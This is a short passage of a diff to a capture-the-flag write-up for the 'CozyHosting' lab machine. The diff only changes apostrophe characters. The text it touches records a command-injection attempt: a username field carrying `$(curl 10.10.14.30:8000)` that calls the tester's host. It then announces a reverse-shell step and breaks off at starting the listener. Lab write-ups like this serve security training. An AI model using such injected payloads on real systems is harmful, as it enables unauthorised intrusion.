Paliak/PaliaksNotes/docs/CozyHosting/index.md

 ![http response showing ssh output passed in as the err param](Assets/burp_ssh_output_in_err.jpg)

 Possibly vulnerable to command injection?
-Let's try some payloads.
+Let’s try some payloads.

 `host=localhost&username=$(curl 10.10.14.30:8000)` results in: `Location: http://cozyhosting.htb/admin?error=Username can't contain whitespaces!`.
 [Hacktricks](https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions) seems to have quite a bit of good content on this.
-Let's try the short rev shell trick.
+Let’s try the short rev shell trick.

 Start the listener: